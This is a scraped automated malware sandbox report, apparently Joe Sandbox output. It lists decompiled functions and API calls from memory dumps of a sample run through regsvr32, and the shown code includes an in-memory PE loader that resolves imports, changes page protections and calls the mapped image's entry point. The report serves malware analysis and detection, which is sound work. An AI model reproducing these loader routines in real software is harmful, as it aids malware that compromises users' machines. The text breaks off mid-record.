                                                  0x005e13ca
                                                  0x005e13ce
                                                  0x005e13d5
                                                  0x005e13d7
                                                  0x005e13e3
                                                  0x005e13e5
                                                  0x005e13f4
                                                  0x005e13e7
                                                  0x005e13ed
                                                  0x005e13ed
                                                  0x005e13e5
                                                  0x005e13fc
                                                  0x005e13fc
                                                  0x005e1407

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitThreadlstrlen
                                                  • String ID:
                                                  • API String ID: 2636182767-0
                                                  • Opcode ID: c992342dd6622324afdb9a767c95938e6051d97e825f430467df7491504de3f0
                                                  • Instruction ID: a35e08e8b04fd91c3902b1446eebd66ca55eb16928f94f4d65d77729c822d37a
                                                  • Opcode Fuzzy Hash: c992342dd6622324afdb9a767c95938e6051d97e825f430467df7491504de3f0
                                                  • Instruction Fuzzy Hash: 2B11AF319046C59BDB1CDB66CC8CD9B7BECBB58300F010815B1D5DB161E730E5488B56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C854BC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00C854BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00C82049(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00C89039(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                  0x00c854c1
                                                  0x00c854cc
                                                  0x00c854ce
                                                  0x00c854d4
                                                  0x00c854d6
                                                  0x00c854db
                                                  0x00c854e4
                                                  0x00c854e8
                                                  0x00c854f1
                                                  0x00c854f5
                                                  0x00c85504
                                                  0x00c854f7
                                                  0x00c854f8
                                                  0x00c854fd
                                                  0x00c854fd
                                                  0x00c854f5
                                                  0x00c854e8
                                                  0x00c8550d

                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00C8A306,7519F710,00000000,?,?,00C8A306), ref: 00C854D4
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00C8A306,00C8A307,?,?,00C8A306), ref: 00C854F1
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ComputerHeapName$AllocateFree
                                                  • String ID:
                                                  • API String ID: 187446995-0
                                                  • Opcode ID: 79d7c9f63a1fea496a80f8c84f85ae81534a31d26ae520be778562f0ba7b99f9
                                                  • Instruction ID: 42a665fac0a576e37cdcdb4b136c051c18b77b37fe15fe2e79f894eb60908d98
                                                  • Opcode Fuzzy Hash: 79d7c9f63a1fea496a80f8c84f85ae81534a31d26ae520be778562f0ba7b99f9
                                                  • Instruction Fuzzy Hash: F8F0BE32600109FAEB10E6AA8C40FAF36EEDBC5748F200069A911E3100EAB0DF01A774
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C88055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xc8d23c) == 0) {
						E00C8970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xc8d23c) == 1) {
						_t10 = E00C86A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                  0x00c8805c
                                                  0x00c8805d
                                                  0x00c88060
                                                  0x00c88092
                                                  0x00c88094
                                                  0x00c88094
                                                  0x00c88062
                                                  0x00c88063
                                                  0x00c88078
                                                  0x00c8807f
                                                  0x00c88081
                                                  0x00c88081
                                                  0x00c8807f
                                                  0x00c88063
                                                  0x00c8809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(00C8D23C), ref: 00C8806A
                                                    • Part of subcall function 00C86A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C86A69
                                                  • InterlockedDecrement.KERNEL32(00C8D23C), ref: 00C8808A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 4110adcfe40f2526878a7a7d269d7aaa1acdde61f6fe1e157b6440a7a269df15
                                                  • Instruction ID: fc92a13b323fa4fc345ba06106aa0f675f9274245e7255ac9ce20de6ca200470
                                                  • Opcode Fuzzy Hash: 4110adcfe40f2526878a7a7d269d7aaa1acdde61f6fe1e157b6440a7a269df15
                                                  • Instruction Fuzzy Hash: 58E026342002219383383BF09C48B6EA740AF10BCCF844020F695D14A0CF20DC4CA7ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C89318, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 34%
                                                  			E00C89318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xc8d27c; // 0x41a5a8
				_t4 = _t15 + 0xc8e39c; // 0x10a8944
				_t20 = _t4;
				_t6 = _t15 + 0xc8e124; // 0x650047
				_t17 = E00C89152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00C89FC9(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                  0x00c89322
                                                  0x00c89324
                                                  0x00c8932b
                                                  0x00c8932c
                                                  0x00c8932d
                                                  0x00c8932e
                                                  0x00c89334
                                                  0x00c89339
                                                  0x00c89339
                                                  0x00c89343
                                                  0x00c89355
                                                  0x00c8935c
                                                  0x00c8938b
                                                  0x00c8935e
                                                  0x00c89363
                                                  0x00c89388
                                                  0x00c89365
                                                  0x00c89368
                                                  0x00c8936f
                                                  0x00c8937a
                                                  0x00c89371
                                                  0x00c89374
                                                  0x00c89374
                                                  0x00c8937e
                                                  0x00c8937e
                                                  0x00c89363
                                                  0x00c89392

                                                  APIs
                                                    • Part of subcall function 00C89152: SysFreeString.OLEAUT32(?), ref: 00C89231
                                                    • Part of subcall function 00C89FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00C87946,004F0053,00000000,?), ref: 00C89FD2
                                                    • Part of subcall function 00C89FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00C87946,004F0053,00000000,?), ref: 00C89FFC
                                                    • Part of subcall function 00C89FC9: memset.NTDLL ref: 00C8A010
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C8937E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 397948122-0
                                                  • Opcode ID: 36de498f9ea5bfc41ea4ba6538a787944ee19cfa65b434d4ab6c8c78e6a93ba5
                                                  • Instruction ID: 018814d56f04ef1361e924146e16f4578175cca899f72b7c33214180f44e15c6
                                                  • Opcode Fuzzy Hash: 36de498f9ea5bfc41ea4ba6538a787944ee19cfa65b434d4ab6c8c78e6a93ba5
                                                  • Instruction Fuzzy Hash: 2A01B132500129BFCF10BFA8CC449BEBBB8FB45748F044825FA11E20B0D37099549795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1FE7, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E005E1FE7(void* __eax, intOrPtr _a4) {

				 *0x5e4148 =  *0x5e4148 & 0x00000000;
				_push(0);
				_push(0x5e4144);
				_push(1);
				_push(_a4);
				 *0x5e4140 = 0xc; // executed
				L005E1BD6(); // executed
				return __eax;
			}



                                                  0x005e1fe7
                                                  0x005e1fee
                                                  0x005e1ff0
                                                  0x005e1ff5
                                                  0x005e1ff7
                                                  0x005e1ffb
                                                  0x005e2005
                                                  0x005e200a

                                                  APIs
                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(005E1387,00000001,005E4144,00000000), ref: 005E2005
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DescriptorSecurity$ConvertString
                                                  • String ID:
                                                  • API String ID: 3907675253-0
                                                  • Opcode ID: 50e40b9932d83ac41239c79b7a0374757d5d4c69fe008fa94e7f7e11f53ab7ee
                                                  • Instruction ID: c7b5108b5fa7f61c304aefef66bd61b2116b5610d210727caaff7827dc283f53
                                                  • Opcode Fuzzy Hash: 50e40b9932d83ac41239c79b7a0374757d5d4c69fe008fa94e7f7e11f53ab7ee
                                                  • Instruction Fuzzy Hash: 96C04CB4140381A7EA2C9B029C86F057A567770705F104508F1902A1D083F91098DD19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C82049, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C82049(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xc8d238, 0, _a4); // executed
				return _t2;
			}




                                                  0x00c82055
                                                  0x00c8205b

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 4e29ab31fc2c7a38ed3b284e8eb2651d50edf32635e394c63af3af7994e9d56d
                                                  • Instruction ID: fa8a242a43f2b1016227e9c74161c85ca19bee9d37d63dc321c83e9e905f3912
                                                  • Opcode Fuzzy Hash: 4e29ab31fc2c7a38ed3b284e8eb2651d50edf32635e394c63af3af7994e9d56d
                                                  • Instruction Fuzzy Hash: 78B01236400100EBCA064B00DD04F0DBB21AB54710F004114B205440B0C3314860FB1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1E11, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E005E1E11(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x5e414c;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x5e414c - 0x63698bc4 &  !( *0x5e414c - 0x63698bc4);
				_t18 = E005E1A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x5e414c - 0x63698bc4 &  !( *0x5e414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x5e414c - 0x63698bc4 &  !( *0x5e414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E005E125B(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E005E1745(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E005E1179(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E005E1DFC(_t42);
					L8:
					return _t29;
				}
			}













                                                  0x005e1e19
                                                  0x005e1e1b
                                                  0x005e1e37
                                                  0x005e1e48
                                                  0x005e1e4f
                                                  0x005e1ead
                                                  0x00000000
                                                  0x005e1e51
                                                  0x005e1e51
                                                  0x005e1e5b
                                                  0x005e1e5f
                                                  0x005e1e64
                                                  0x005e1e6c
                                                  0x005e1e70
                                                  0x005e1e75
                                                  0x005e1e7a
                                                  0x005e1e7e
                                                  0x005e1e83
                                                  0x005e1e84
                                                  0x005e1e88
                                                  0x005e1e8d
                                                  0x005e1e95
                                                  0x005e1e95
                                                  0x005e1e8d
                                                  0x005e1e7e
                                                  0x005e1e70
                                                  0x005e1e97
                                                  0x005e1ea0
                                                  0x005e1ea4
                                                  0x005e1eae
                                                  0x005e1eb4
                                                  0x005e1eb4

                                                  APIs
                                                    • Part of subcall function 005E1A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,005E1E4D,?,?,?,?,?,00000002,?,005E1401), ref: 005E1A33
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A55
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A6B
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A81
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A97
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1AAD
                                                    • Part of subcall function 005E125B: memcpy.NTDLL(?,?,?), ref: 005E1288
                                                    • Part of subcall function 005E125B: memcpy.NTDLL(?,?,?), ref: 005E12BB
                                                    • Part of subcall function 005E1745: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 005E177D
                                                    • Part of subcall function 005E1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E11B2
                                                    • Part of subcall function 005E1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E1227
                                                    • Part of subcall function 005E1179: GetLastError.KERNEL32 ref: 005E122D
                                                  • GetLastError.KERNEL32(?,005E1401), ref: 005E1E8F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                  • String ID:
                                                  • API String ID: 2673762927-0
                                                  • Opcode ID: 711ecc7af25614652826946479db43021428a5a1629b91bd4782ad5d51ff7fa6
                                                  • Instruction ID: a22415403f4e36ffc75b1a33e9a8d4210fbc4c949980e412e355a40fdd83efea
                                                  • Opcode Fuzzy Hash: 711ecc7af25614652826946479db43021428a5a1629b91bd4782ad5d51ff7fa6
                                                  • Instruction Fuzzy Hash: E5115E36600B46ABCB249BA6CC84DAB7FBCBFC83047000055FD8297501E6B0ED0587A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C821CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E00C821CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xc8d330;
				E00C884D5();
				while(1) {
					_t8 = E00C812D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00C8809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0xc8d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00C884D5();
					if(_t19 != 0) {
						_t22 =  *0xc8d338; // 0x10a9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                  0x00c821d5
                                                  0x00c821d9
                                                  0x00c821da
                                                  0x00c821db
                                                  0x00c821e0
                                                  0x00c821e5
                                                  0x00c821ec
                                                  0x00c821f3
                                                  0x00000000
                                                  0x00000000
                                                  0x00c821f5
                                                  0x00c821fa
                                                  0x00c821fb
                                                  0x00c82202
                                                  0x00c8221c
                                                  0x00000000
                                                  0x00c82204
                                                  0x00c82204
                                                  0x00c82206
                                                  0x00c82209
                                                  0x00c8220d
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8220f
                                                  0x00c8220d
                                                  0x00c82224
                                                  0x00c82224
                                                  0x00c82226
                                                  0x00c8222d
                                                  0x00c8222f
                                                  0x00c82235
                                                  0x00c8223c
                                                  0x00c8224c
                                                  0x00c82244
                                                  0x00c82247
                                                  0x00c82247
                                                  0x00c8224f
                                                  0x00c8224f
                                                  0x00c82258
                                                  0x00c82258
                                                  0x00c82222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00C884D5: GetProcAddress.KERNEL32(36776F57,00C821E5), ref: 00C884F0
                                                    • Part of subcall function 00C812D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00C812FF
                                                    • Part of subcall function 00C812D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00C81321
                                                    • Part of subcall function 00C812D4: memset.NTDLL ref: 00C8133B
                                                    • Part of subcall function 00C812D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C81379
                                                    • Part of subcall function 00C812D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C8138D
                                                    • Part of subcall function 00C812D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00C813A4
                                                    • Part of subcall function 00C812D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C813B0
                                                    • Part of subcall function 00C812D4: lstrcat.KERNEL32(?,642E2A5C), ref: 00C813F1
                                                    • Part of subcall function 00C812D4: FindFirstFileA.KERNELBASE(?,?), ref: 00C81407
                                                    • Part of subcall function 00C8809F: lstrlen.KERNEL32(?,00000000,00C8D330,00000001,00C82200,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9), ref: 00C880A8
                                                    • Part of subcall function 00C8809F: mbstowcs.NTDLL ref: 00C880CF
                                                    • Part of subcall function 00C8809F: memset.NTDLL ref: 00C880E1
                                                  • HeapFree.KERNEL32(00000000,00C8D00C,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9,00C8D00C,?,00C823E9), ref: 00C8221C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: a736b4211db825ee01340443a941b28f147ea1b51ac21fd8dc6fce354182ba4c
                                                  • Instruction ID: 12adb11d0418270b408d67d609b2809715a16d6871d4ed175a98cf8007cc8562
                                                  • Opcode Fuzzy Hash: a736b4211db825ee01340443a941b28f147ea1b51ac21fd8dc6fce354182ba4c
                                                  • Instruction Fuzzy Hash: 36012876200204AAE7007FE6DC89F6A72A9EB8537CF500036BD45C70A0D6759D42A32D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C81262, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C81262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00C89318(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00C86BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xc8d238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}







                                                  0x00c8126a
                                                  0x00c812bf
                                                  0x00c812c4
                                                  0x00c8126c
                                                  0x00c81286
                                                  0x00c8128a
                                                  0x00c8128f
                                                  0x00c81291
                                                  0x00c812a1
                                                  0x00c812ad
                                                  0x00c81293
                                                  0x00c81293
                                                  0x00c81296
                                                  0x00c8129b
                                                  0x00c8129b
                                                  0x00c81291
                                                  0x00c8128a
                                                  0x00c812ca

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,00C8743A,?,004F0053,010A9388,00000000,?), ref: 00C812AD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: cee3e6c210214bb29fef6aaa8443de072bd5c2cf2d349aabfbfb3b2ea3cd72c9
                                                  • Instruction ID: f3d7c3cfe4c95de4f80dcf0c1327970de640bcf382b736e736d52f4a81776072
                                                  • Opcode Fuzzy Hash: cee3e6c210214bb29fef6aaa8443de072bd5c2cf2d349aabfbfb3b2ea3cd72c9
                                                  • Instruction Fuzzy Hash: 57011D32100249FBCB12AF44DC01FAE3BBAEB94364F198429FE15DA160D731D921DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C82436, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E00C82436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                  0x00c82436
                                                  0x00c82443
                                                  0x00c82444
                                                  0x00c82445
                                                  0x00c8244c
                                                  0x00c8247a
                                                  0x00c8247b
                                                  0x00c8247e
                                                  0x00c82484
                                                  0x00000000
                                                  0x00000000
                                                  0x00c82463
                                                  0x00c8246d
                                                  0x00c82474
                                                  0x00000000
                                                  0x00c82465
                                                  0x00c82468
                                                  0x00c82488
                                                  0x00c8246a
                                                  0x00c8246a
                                                  0x00000000
                                                  0x00c8246a
                                                  0x00c82468
                                                  0x00c8248f
                                                  0x00c82495
                                                  0x00c82495
                                                  0x00000000

                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00C8247E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 0d0e6d9ef6079d979e9c2bf340dfe69194b6345d319008b449d3a8d0dbbfb5c4
                                                  • Instruction ID: 36db390f8faed6e401bb0ac627ee301019232023c9de7e94027918516874e4a3
                                                  • Opcode Fuzzy Hash: 0d0e6d9ef6079d979e9c2bf340dfe69194b6345d319008b449d3a8d0dbbfb5c4
